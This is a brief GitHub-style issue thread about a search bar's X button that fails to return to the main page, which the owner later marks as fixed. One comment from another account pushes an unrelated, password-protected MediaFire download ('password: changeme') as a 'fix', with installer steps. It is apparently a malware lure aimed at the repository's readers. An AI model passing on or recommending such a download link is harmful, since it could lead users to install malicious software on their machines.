### ISSUE TITLE
Search bar's X isn't going back to the main page

### ISSUE THREAD

**Issue by mtklass** [mtklass/twotech#3]
Search bar X is there now, but not doing anything. Seems like it should be an easy fix, when I can squeeze a little time in.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mtklass** [comment]
Fixed a while ago
